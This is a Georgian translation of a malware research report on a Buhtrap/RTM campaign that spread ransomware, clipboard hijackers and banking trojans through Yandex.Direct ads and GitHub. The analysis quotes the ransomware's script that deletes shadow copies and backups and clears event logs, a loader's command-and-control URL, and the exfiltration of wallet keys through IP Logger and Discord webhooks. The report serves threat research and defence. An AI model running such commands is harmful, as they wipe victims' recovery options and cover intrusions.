Backdoor და Buhtrap შიფრატორი გავრცელდა Yandex.Direct-ის გამოყენებით

კიბერშეტევის დროს ბუღალტერების სამიზნე, შეგიძლიათ გამოიყენოთ სამუშაო დოკუმენტები, რომლებსაც ისინი ეძებენ ინტერნეტში. ეს არის დაახლოებით ის, რასაც აკეთებს კიბერ ჯგუფი ბოლო რამდენიმე თვის განმავლობაში, ავრცელებს ცნობილ უკანა კარებს. ბუჰტრაპი и RTM, ასევე შიფრატორები და პროგრამული უზრუნველყოფა კრიპტოვალუტების მოპარვისთვის. სამიზნეების უმეტესობა რუსეთში მდებარეობს. თავდასხმა განხორციელდა Yandex.Direct-ზე მავნე რეკლამის განთავსებით. პოტენციურ მსხვერპლებს მიმართეს ვებსაიტზე, სადაც მათ სთხოვეს ჩამოტვირთონ მავნე ფაილი, რომელიც გადაცმული იყო დოკუმენტის შაბლონად. Yandex-მა ამოიღო მავნე რეკლამა ჩვენი გაფრთხილების შემდეგ.

Buhtrap-ის წყაროს კოდი წარსულში გაჟონა ინტერნეტში, ასე რომ ყველას შეუძლია მისი გამოყენება. ჩვენ არ გვაქვს ინფორმაცია RTM კოდის ხელმისაწვდომობასთან დაკავშირებით.

ამ პოსტში ჩვენ გეტყვით, თუ როგორ ავრცელებდნენ თავდამსხმელებმა მავნე პროგრამა Yandex.Direct-ის გამოყენებით და უმასპინძლეს მას GitHub-ზე. პოსტი დასრულდება მავნე პროგრამის ტექნიკური ანალიზით.

Buhtrap და RTM დაბრუნდნენ ბიზნესში

გავრცელების მექანიზმი და მსხვერპლი

მსხვერპლთათვის მიწოდებული სხვადასხვა ტვირთი საერთო გამრავლების მექანიზმს იზიარებს. თავდამსხმელთა მიერ შექმნილი ყველა მავნე ფაილი განთავსდა ორ სხვადასხვა GitHub საცავში.

როგორც წესი, საცავი შეიცავდა ერთ ჩამოტვირთვის მავნე ფაილს, რომელიც ხშირად იცვლებოდა. ვინაიდან GitHub გაძლევთ საშუალებას ნახოთ საცავში ცვლილებების ისტორია, ჩვენ შეგვიძლია დავინახოთ, რა მავნე პროგრამა გავრცელდა გარკვეული პერიოდის განმავლობაში. დაზარალებულის დასარწმუნებლად, რომ ჩამოტვირთოს მავნე ფაილი, გამოყენებული იქნა ვებგვერდი blanki-shabloni24[.]ru, რომელიც ნაჩვენებია ზემოთ მოცემულ ფიგურაში.

საიტის დიზაინი და მავნე ფაილების ყველა სახელწოდება მიჰყვება ერთ კონცეფციას - ფორმები, შაბლონები, კონტრაქტები, ნიმუშები და ა.შ. იმის გათვალისწინებით, რომ Buhtrap და RTM პროგრამული უზრუნველყოფა უკვე გამოიყენებოდა ბუღალტერებზე თავდასხმების დროს, ჩვენ ვივარაუდეთ, რომ სტრატეგია ახალ კამპანიაშიც იგივეა. ერთადერთი კითხვაა, როგორ მოხვდა მსხვერპლი თავდამსხმელთა ვებსაიტზე.

ინფექცია

სულ მცირე რამდენიმე პოტენციური მსხვერპლი, რომლებიც აღმოჩნდნენ ამ საიტზე, მიიპყრო მავნე რეკლამამ. ქვემოთ მოცემულია URL-ის მაგალითი:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

როგორც ლინკიდან ხედავთ, ბანერი განთავსდა ლეგიტიმურ საბუღალტრო ფორუმზე bb.f2[.]kz. მნიშვნელოვანია აღინიშნოს, რომ ბანერები გამოჩნდა სხვადასხვა საიტებზე, ყველას ჰქონდა იგივე კამპანიის ID (blanki_rsya) და უმეტესობა ეხებოდა ბუღალტრულ ან იურიდიულ დახმარებას. URL აჩვენებს, რომ პოტენციურმა მსხვერპლმა გამოიყენა მოთხოვნა „ჩამოტვირთეთ ინვოისის ფორმა“, რომელიც მხარს უჭერს მიზანმიმართული თავდასხმების ჩვენს ჰიპოთეზას. ქვემოთ მოცემულია საიტები, სადაც გამოჩნდა ბანერები და შესაბამისი საძიებო მოთხოვნები.

• ჩამოტვირთეთ ინვოისის ფორმა – bb.f2[.]kz
• ნიმუში ხელშეკრულება - Ipopen[.]ru
• განაცხადის საჩივრის ნიმუში - 77metrov[.]ru
• შეთანხმების ფორმა - blank-dogovor-kupli-prodazhi[.]ru
• სასამართლო შუამდგომლობის ნიმუში - zen.yandex[.]ru
• საჩივრის ნიმუში - yurday[.]ru
• ხელშეკრულების ფორმების ნიმუში – Regforum[.]ru
• კონტრაქტის ფორმა – assistentus[.]ru
• ბინის ხელშეკრულების ნიმუში - napravah[.]com
• იურიდიული ხელშეკრულებების ნიმუშები - avito[.]ru

blanki-shabloni24[.]ru საიტი შეიძლება კონფიგურირებული იყოს მარტივი ვიზუალური შეფასების გასავლელად. როგორც წესი, რეკლამა, რომელიც მიუთითებს პროფესიონალურ საიტზე GitHub-ის ბმულით, აშკარად ცუდი არ ჩანს. გარდა ამისა, თავდამსხმელები ატვირთეს მავნე ფაილები საცავში მხოლოდ შეზღუდული პერიოდის განმავლობაში, სავარაუდოდ კამპანიის დროს. უმეტეს დროს, GitHub საცავი შეიცავდა ცარიელ zip არქივს ან ცარიელ EXE ფაილს. ამრიგად, თავდამსხმელებს შეეძლოთ Yandex.Direct-ის მეშვეობით რეკლამის გავრცელება იმ საიტებზე, რომლებსაც, სავარაუდოდ, სტუმრობდნენ ბუღალტერები, რომლებიც მოდიოდნენ კონკრეტული საძიებო მოთხოვნების საპასუხოდ.

შემდეგი, მოდით გადავხედოთ ამ გზით გადანაწილებულ სხვადასხვა დატვირთვას.

დატვირთვის ანალიზი

გავრცელების ქრონოლოგია

მავნე კამპანია დაიწყო 2018 წლის ოქტომბრის ბოლოს და აქტიურია წერის მომენტისთვის. ვინაიდან მთელი საცავი საჯაროდ იყო ხელმისაწვდომი GitHub-ზე, ჩვენ შევადგინეთ ექვსი სხვადასხვა მავნე პროგრამის ოჯახის განაწილების ზუსტი ვადები (იხილეთ სურათი ქვემოთ). ჩვენ დავამატეთ სტრიქონი, რომელიც აჩვენებს, როდის იქნა აღმოჩენილი ბანერის ბმული, რომელიც იზომება ESET ტელემეტრიით, git ისტორიასთან შესადარებლად. როგორც ხედავთ, ეს კარგად არის დაკავშირებული GitHub-ზე დატვირთვის ხელმისაწვდომობასთან. თებერვლის ბოლოს არსებული შეუსაბამობა შეიძლება აიხსნას იმით, რომ ჩვენ არ გვქონდა ცვლილებების ისტორიის ნაწილი, რადგან საცავი ამოიღეს GitHub-დან, სანამ მას სრულად მივიღებდით.

სურათი 1. მავნე პროგრამების გავრცელების ქრონოლოგია.

კოდის ხელმოწერის სერთიფიკატები

კამპანიამ გამოიყენა მრავალი სერთიფიკატი. ზოგიერთ მათგანს ხელს აწერდა მავნე პროგრამის ერთზე მეტი ოჯახი, რაც ასევე მიუთითებს იმაზე, რომ სხვადასხვა ნიმუშები ერთსა და იმავე კამპანიას ეკუთვნოდა. მიუხედავად პირადი გასაღების ხელმისაწვდომობისა, ოპერატორები სისტემატურად არ აწერდნენ ხელს ორობითი ფაილებს და არ იყენებდნენ გასაღებს ყველა ნიმუშისთვის. 2019 წლის თებერვლის ბოლოს, თავდამსხმელებმა დაიწყეს არასწორი ხელმოწერების შექმნა Google-ის საკუთრებაში არსებული სერტიფიკატის გამოყენებით, რომლის პირადი გასაღები არ ჰქონდათ.

კამპანიაში ჩართული ყველა სერთიფიკატი და მავნე პროგრამების ოჯახები, რომლებსაც ისინი ხელს აწერენ, ჩამოთვლილია ქვემოთ მოცემულ ცხრილში.

ჩვენ ასევე გამოვიყენეთ ეს კოდის ხელმოწერის სერთიფიკატები სხვა მავნე პროგრამების ოჯახებთან კავშირების დასამყარებლად. სერთიფიკატების უმეტესობისთვის, ჩვენ ვერ ვიპოვნეთ ნიმუშები, რომლებიც არ იყო განაწილებული GitHub საცავში. თუმცა, TOV "MARIYA" სერთიფიკატი გამოიყენებოდა ბოტნეტის კუთვნილი მავნე პროგრამული უზრუნველყოფის ხელმოწერისთვის ვაუჩოსი, adware და მაინერები. ნაკლებად სავარაუდოა, რომ ეს მავნე პროგრამა დაკავშირებული იყოს ამ კამპანიასთან. სავარაუდოდ, სერთიფიკატი შეძენილია darknet-ზე.

Win32/Filecoder.Buhtrap

პირველი კომპონენტი, რომელმაც ჩვენი ყურადღება მიიპყრო, იყო ახლად აღმოჩენილი Win32/Filecoder.Buhtrap. ეს არის დელფის ბინარული ფაილი, რომელიც ზოგჯერ შეფუთულია. იგი ძირითადად გავრცელდა 2019 წლის თებერვალ-მარტში. ის იქცევა ისე, როგორც გამოსასყიდ პროგრამას შეეფერება - ის ეძებს ადგილობრივ დისკებსა და ქსელის საქაღალდეებს და შიფრავს აღმოჩენილ ფაილებს. მას არ სჭირდება ინტერნეტ კავშირი, რომ გატეხილი იყოს, რადგან ის არ დაუკავშირდება სერვერს დაშიფვრის გასაღებების გასაგზავნად. ამის ნაცვლად, ის ამატებს „ჟეტონს“ გამოსასყიდის შეტყობინების ბოლოს და გვთავაზობს ელექტრონული ფოსტის ან Bitmessage-ის გამოყენებას ოპერატორებთან დასაკავშირებლად.

რაც შეიძლება მეტი მგრძნობიარე რესურსის დაშიფვრისთვის, Filecoder.Buhtrap აწარმოებს თემას, რომელიც შექმნილია საკვანძო პროგრამული უზრუნველყოფის გასაუქმებლად, რომელსაც შესაძლოა ჰქონდეს ღია ფაილების დამმუშავებლები, რომლებიც შეიცავს ღირებულ ინფორმაციას, რამაც შეიძლება ხელი შეუშალოს დაშიფვრას. სამიზნე პროცესები ძირითადად არის მონაცემთა ბაზის მართვის სისტემები (DBMS). გარდა ამისა, Filecoder.Buhtrap შლის ჟურნალის ფაილებს და სარეზერვო ასლებს, რათა გაართულოს მონაცემთა აღდგენა. ამისათვის გაუშვით სურათების სკრიპტი ქვემოთ.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap იყენებს ლეგიტიმურ ონლაინ IP Logger სერვისს, რომელიც შექმნილია ვებსაიტის ვიზიტორების შესახებ ინფორმაციის შესაგროვებლად. ეს გამიზნულია გამოსასყიდის მსხვერპლთა თვალყურის დევნებისთვის, რაც პასუხისმგებელია ბრძანების სტრიქონზე:

mshta.exe "javascript:document.write('');"

დაშიფვრის ფაილები შეირჩევა, თუ ისინი არ ემთხვევა სამი გამორიცხვის სიას. ჯერ ერთი, ფაილები შემდეგი გაფართოებებით არ არის დაშიფრული: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys და .ღამურა. მეორეც, ყველა ფაილი, რომლის სრული გზა შეიცავს დირექტორიას სტრიქონებს ქვემოთ მოცემული სიიდან, გამორიცხულია.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

მესამე, ზოგიერთი ფაილის სახელები ასევე გამორიცხულია დაშიფვრიდან, მათ შორის გამოსასყიდის შეტყობინების ფაილის სახელი. სია წარმოდგენილია ქვემოთ. ცხადია, ყველა ეს გამონაკლისი გამიზნულია მანქანის მუშაობის შესანარჩუნებლად, მაგრამ მინიმალური გზისთვის.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ფაილის დაშიფვრის სქემა

შესრულების შემდეგ, მავნე პროგრამა წარმოქმნის 512-ბიტიან RSA გასაღების წყვილს. შემდეგ პირადი მაჩვენებლები (d) და მოდული (n) დაშიფრულია მყარი კოდირებული 2048-ბიტიანი საჯარო გასაღებით (საჯარო მაჩვენებლები და მოდული), zlib-შეფუთული და ბაზის64 კოდირებული. ამაზე პასუხისმგებელი კოდი ნაჩვენებია სურათზე 2.

სურათი 2. 512-ბიტიანი RSA გასაღების წყვილის წარმოქმნის პროცესის Hex-Rays დეკომპილაციის შედეგი.

ქვემოთ მოცემულია მარტივი ტექსტის მაგალითი გენერირებული პირადი გასაღებით, რომელიც წარმოადგენს გამოსასყიდის შეტყობინებას მიმაგრებული ჟეტონს.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

თავდამსხმელთა საჯარო გასაღები მოცემულია ქვემოთ.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ფაილები დაშიფრულია AES-128-CBC გამოყენებით 256-ბიტიანი გასაღებით. ყოველი დაშიფრული ფაილისთვის გენერირდება ახალი გასაღები და ახალი ინიციალიზაციის ვექტორი. ძირითადი ინფორმაცია ემატება დაშიფრული ფაილის ბოლოს. მოდით განვიხილოთ დაშიფრული ფაილის ფორმატი.
დაშიფრულ ფაილებს აქვთ შემდეგი სათაური:

წყაროს ფაილის მონაცემები VEGA ჯადოსნური მნიშვნელობის დამატებით დაშიფრულია პირველ 0x5000 ბაიტზე. გაშიფვრის ყველა ინფორმაცია თან ერთვის ფაილს შემდეგი სტრუქტურით:

- ფაილის ზომის მარკერი შეიცავს ნიშანს, რომელიც მიუთითებს არის თუ არა ფაილის ზომა 0x5000 ბაიტზე მეტი
— AES გასაღების ბლოკი = ZlibCompress (RSAEncrypt (AES გასაღები + IV, გენერირებული RSA გასაღების წყვილის საჯარო გასაღები))
- RSA გასაღები blob = ZlibCompress (RSAEncrypt (გენერირებული RSA პირადი გასაღები, მყარი კოდირებული RSA საჯარო გასაღები))

Win32/ClipBanker

Win32/ClipBanker არის კომპონენტი, რომელიც ნაწილდებოდა პერიოდულად 2018 წლის ოქტომბრის ბოლოდან დეკემბრის დასაწყისამდე. მისი როლი არის ბუფერში შიგთავსის მონიტორინგი, ის ეძებს კრიპტოვალუტის საფულეების მისამართებს. მიზნობრივი საფულის მისამართის დადგენის შემდეგ, ClipBanker ცვლის მას მისამართით, რომელიც სავარაუდოდ ეკუთვნის ოპერატორებს. ჩვენ მიერ გამოკვლეული ნიმუშები არც ყუთში იყო და არც ბუნდოვანი. ერთადერთი მექანიზმი, რომელიც გამოიყენება ქცევის დასაფარად, არის სიმებიანი დაშიფვრა. ოპერატორის საფულის მისამართები დაშიფრულია RC4-ის გამოყენებით. სამიზნე კრიპტოვალუტებია Bitcoin, Bitcoin cash, Dogecoin, Ethereum და Ripple.

იმ პერიოდში, როდესაც მავნე პროგრამა ვრცელდებოდა თავდამსხმელების ბიტკოინის საფულეებზე, მცირე თანხა გაეგზავნა VTS-ს, რაც ეჭვს აყენებს კამპანიის წარმატებას. გარდა ამისა, არ არსებობს არანაირი მტკიცებულება იმისა, რომ ეს ტრანზაქციები საერთოდ იყო დაკავშირებული ClipBanker-თან.

Win32/RTM

Win32/RTM კომპონენტი დარიგდა რამდენიმე დღის განმავლობაში 2019 წლის მარტის დასაწყისში. RTM არის ტროას ბანკირი, რომელიც დაწერილია დელფში, რომელიც მიზნად ისახავს დისტანციურ საბანკო სისტემებს. 2017 წელს ESET-ის მკვლევარებმა გამოაქვეყნეს დეტალური ანალიზი ამ პროგრამის აღწერა კვლავ აქტუალურია. 2019 წლის იანვარში ასევე გამოვიდა Palo Alto Networks ბლოგის პოსტი RTM-ის შესახებ.

Buhtrap Loader

გარკვეული პერიოდის განმავლობაში, GitHub-ზე ხელმისაწვდომი იყო გადმომწერი, რომელიც არ იყო წინა Buhtrap ინსტრუმენტების მსგავსი. ის უხვევს https://94.100.18[.]67/RSS.php?<some_id> შემდეგი ეტაპის მისაღებად და პირდაპირ იტვირთება მეხსიერებაში. ჩვენ შეგვიძლია გამოვყოთ მეორე ეტაპის კოდის ორი ქცევა. პირველ URL-ში RSS.php-მა პირდაპირ გადასცა Buhtrap backdoor - ეს backdoor ძალიან ჰგავს მას, რაც ხელმისაწვდომი იყო წყაროს კოდის გაჟონვის შემდეგ.

საინტერესოა, რომ ჩვენ ვხედავთ რამდენიმე კამპანიას Buhtrap backdoor-ით და მათ, სავარაუდოდ, სხვადასხვა ოპერატორები მართავენ. ამ შემთხვევაში, მთავარი განსხვავება ისაა, რომ უკანა კარი პირდაპირ იტვირთება მეხსიერებაში და არ იყენებს ჩვეულ სქემას DLL განლაგების პროცესთან, რომელზეც ჩვენ ვისაუბრეთ. ადრე. გარდა ამისა, ოპერატორებმა შეცვალეს RC4 გასაღები, რომელიც გამოიყენება ქსელის ტრაფიკის დაშიფვრისთვის C&C სერვერზე. კამპანიების უმეტესობაში, რაც ჩვენ ვნახეთ, ოპერატორებს არ შეუწუხებიათ ამ გასაღების შეცვლა.

მეორე, უფრო რთული ქცევა იყო ის, რომ RSS.php URL გადაეცა სხვა ჩამტვირთველს. მან განახორციელა გარკვეული გაუგებრობა, როგორიცაა დინამიური იმპორტის ცხრილის აღდგენა. ჩამტვირთველის დანიშნულებაა C&C სერვერთან დაკავშირება msiofficeupd[.]com/api/F27F84EDA4D13B15/2, გაგზავნეთ ჟურნალები და დაელოდეთ პასუხს. ის ამუშავებს პასუხს ბლომის სახით, იტვირთება მეხსიერებაში და ახორციელებს მას. დატვირთვა, რომელიც ჩვენ ვნახეთ ამ ჩამტვირთველის შესრულებისას, იყო იგივე Buhtrap backdoor, მაგრამ შეიძლება იყოს სხვა კომპონენტები.

Android/Spy.Banker

საინტერესოა, რომ Android-ის კომპონენტი ასევე ნაპოვნი იქნა GitHub საცავში. ის მთავარ ფილიალში მხოლოდ ერთი დღე იყო - 1 წლის 2018 ნოემბერი. GitHub-ზე გამოქვეყნების გარდა, ESET ტელემეტრია ვერ პოულობს ამ მავნე პროგრამის გავრცელების მტკიცებულებებს.

კომპონენტი განთავსებული იყო როგორც Android აპლიკაციის პაკეტი (APK). ის ძლიერ ბუნდოვანია. მავნე ქცევა იმალება დაშიფრულ JAR-ში, რომელიც მდებარეობს APK-ში. ის დაშიფრულია RC4-ით ამ გასაღების გამოყენებით:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

იგივე გასაღები და ალგორითმი გამოიყენება სტრიქონების დაშიფვრისთვის. JAR მდებარეობს ქ APK_ROOT + image/files. ფაილის პირველი 4 ბაიტი შეიცავს დაშიფრული JAR-ის სიგრძეს, რომელიც იწყება სიგრძის ველის შემდეგ.

ფაილის გაშიფვრის შემდეგ აღმოვაჩინეთ, რომ ეს იყო Anubis - ადრე დოკუმენტირებული ბანკირი ანდროიდისთვის. მავნე პროგრამას აქვს შემდეგი მახასიათებლები:

• მიკროფონის ჩაწერა
• ეკრანის ანაბეჭდების გადაღება
• GPS კოორდინატების მიღება
• keylogger
• მოწყობილობის მონაცემების დაშიფვრა და გამოსასყიდის მოთხოვნა
• სპამის გაგზავნა

საინტერესოა, რომ ბანკირმა გამოიყენა Twitter, როგორც სარეზერვო საკომუნიკაციო არხი სხვა C&C სერვერის მისაღებად. ჩვენ მიერ გაანალიზებულმა ნიმუშმა გამოიყენა @JonesTrader ანგარიში, მაგრამ ანალიზის დროს ის უკვე დაბლოკილი იყო.

ბანკირი შეიცავს Android მოწყობილობაზე სამიზნე აპლიკაციების ჩამონათვალს. ის უფრო გრძელია ვიდრე Sophos-ის კვლევაში მოპოვებული სია. სიაში შედის მრავალი საბანკო აპლიკაცია, ონლაინ შოპინგის პროგრამები, როგორიცაა Amazon და eBay და კრიპტოვალუტის სერვისები.

MSIL/ClipBanker.IH

ამ კამპანიის ფარგლებში განაწილებული ბოლო კომპონენტი იყო .NET Windows შესრულებადი, რომელიც გამოჩნდა 2019 წლის მარტში. შესწავლილი ვერსიების უმეტესობა შეფუთული იყო ConfuserEx v1.0.0-ით. ClipBanker-ის მსგავსად, ეს კომპონენტი იყენებს ბუფერს. მისი მიზანია კრიპტოვალუტების ფართო სპექტრი, ასევე შეთავაზებები Steam-ზე. გარდა ამისა, ის იყენებს IP Logger სერვისს ბიტკოინის პირადი WIF გასაღების მოსაპარად.

დაცვის მექანიზმები
გარდა იმ უპირატესობებისა, რომელსაც ConfuserEx უზრუნველყოფს გამართვის, გადაყრისა და გაყალბების თავიდან ასაცილებლად, კომპონენტი მოიცავს ანტივირუსული პროდუქტებისა და ვირტუალური მანქანების გამოვლენის უნარს.

იმის დასადასტურებლად, რომ ის მუშაობს ვირტუალურ მანქანაში, მავნე პროგრამა იყენებს ჩაშენებულ Windows WMI ბრძანების ხაზს (WMIC), რათა მოითხოვოს BIOS ინფორმაცია, კერძოდ:

wmic bios

შემდეგ პროგრამა აანალიზებს ბრძანების გამომავალს და ეძებს საკვანძო სიტყვებს: VBOX, VirtualBox, XEN, qemu, bochs, VM.

ანტივირუსული პროდუქტების აღმოსაჩენად, მავნე პროგრამა აგზავნის Windows Management Instrumentation (WMI) მოთხოვნას Windows Security Center-ის გამოყენებით ManagementObjectSearcher API, როგორც ნაჩვენებია ქვემოთ. base64-დან გაშიფვრის შემდეგ ზარი ასე გამოიყურება:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

სურათი 3. ანტივირუსული პროდუქტების იდენტიფიცირების პროცესი.

გარდა ამისა, მავნე პროგრამა ამოწმებს თუ არა CryptoClipWatcher, ხელსაწყო ბუფერში შეტევებისგან დასაცავად და, გაშვების შემთხვევაში, აჩერებს ყველა თემას ამ პროცესში, რითაც გამორთავს დაცვას.

გამძლეობა

ჩვენ მიერ შესწავლილი მავნე პროგრამის ვერსია თავად კოპირებულია %APPDATA%googleupdater.exe და ადგენს "დამალულ" ატრიბუტს google დირექტორიაში. შემდეგ ის ცვლის მნიშვნელობას SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows-ის რეესტრში და ამატებს გზას updater.exe. ამ გზით, მავნე პროგრამა შესრულდება ყოველ ჯერზე, როდესაც მომხმარებელი შედის სისტემაში.

მავნე ქცევა

ClipBanker-ის მსგავსად, მავნე პროგრამა აკონტროლებს ბუფერში არსებულ შიგთავსს და ეძებს კრიპტოვალუტის საფულის მისამართებს და როდესაც აღმოაჩენს, ცვლის მას ოპერატორის ერთ-ერთი მისამართით. ქვემოთ მოცემულია სამიზნე მისამართების სია, რაც ეფუძნება კოდს.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

თითოეული ტიპის მისამართისთვის არის შესაბამისი რეგულარული გამოხატულება. STEAM_URL მნიშვნელობა გამოიყენება Steam სისტემაზე თავდასხმისთვის, როგორც ჩანს ჩვეულებრივი გამონათქვამიდან, რომელიც გამოიყენება ბუფერში განსასაზღვრად:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

ექსფილტრაციის არხი

ბუფერში მისამართების ჩანაცვლების გარდა, მავნე პროგრამა მიზნად ისახავს Bitcoin, Bitcoin Core და Electrum Bitcoin საფულეების კერძო WIF გასაღებებს. პროგრამა იყენებს plogger.org-ს, როგორც ექსფილტრაციის არხს WIF პირადი გასაღების მისაღებად. ამისათვის ოპერატორები ამატებენ პირადი გასაღების მონაცემებს User-Agent HTTP სათაურში, როგორც ეს ნაჩვენებია ქვემოთ.

სურათი 4. IP Logger კონსოლი გამომავალი მონაცემებით.

ოპერატორებმა არ გამოიყენეს iplogger.org საფულეების ექსფილტრაციისთვის. მათ ალბათ სხვა მეთოდს მიმართეს ველში 255 სიმბოლოს ლიმიტის გამო User-Agentნაჩვენებია IP Logger ვებ ინტერფეისში. ჩვენ მიერ შესწავლილ ნიმუშებში, სხვა გამომავალი სერვერი ინახებოდა გარემოს ცვლადში DiscordWebHook. გასაკვირია, რომ ეს გარემო ცვლადი კოდში არსად არის მინიჭებული. ეს იმაზე მეტყველებს, რომ მავნე პროგრამა ჯერ კიდევ დამუშავების პროცესშია და ცვლადი მინიჭებულია ოპერატორის სატესტო მანქანაზე.

არსებობს კიდევ ერთი ნიშანი იმისა, რომ პროგრამა დამუშავების პროცესშია. ორობითი ფაილი მოიცავს ორ iplogger.org URL-ს და ორივეს მოთხოვნა ხდება მონაცემთა ექსფილტრაციის დროს. ერთ-ერთი ამ URL-ის მოთხოვნისას, Referer ველში მნიშვნელობას წინ უძღვის „DEV /“. ჩვენ ასევე ვიპოვეთ ვერსია, რომელიც არ იყო შეფუთული ConfuserEx-ის გამოყენებით, ამ URL-ის მიმღებს ჰქვია DevFeedbackUrl. გარემოს ცვლადის სახელზე დაყრდნობით, მიგვაჩნია, რომ ოპერატორები გეგმავენ გამოიყენონ ლეგიტიმური სერვისი Discord და მისი ვებ-დაჭერის სისტემა კრიპტოვალუტის საფულეების მოსაპარად.

დასკვნა

ეს კამპანია არის კიბერშეტევების ლეგიტიმური სარეკლამო სერვისების გამოყენების მაგალითი. სქემა მიზნად ისახავს რუსულ ორგანიზაციებს, მაგრამ ჩვენ არ გაგვიკვირდება მსგავსი თავდასხმა არარუსული სერვისების გამოყენებით. კომპრომისის თავიდან ასაცილებლად, მომხმარებლები უნდა იყვნენ დარწმუნებულნი იმ პროგრამული უზრუნველყოფის წყაროს რეპუტაციაში, რომელსაც ისინი ჩამოტვირთავენ.

კომპრომისისა და MITER ATT&CK ატრიბუტების ინდიკატორების სრული სია ხელმისაწვდომია აქ ლინკები.

წყარო: www.habr.com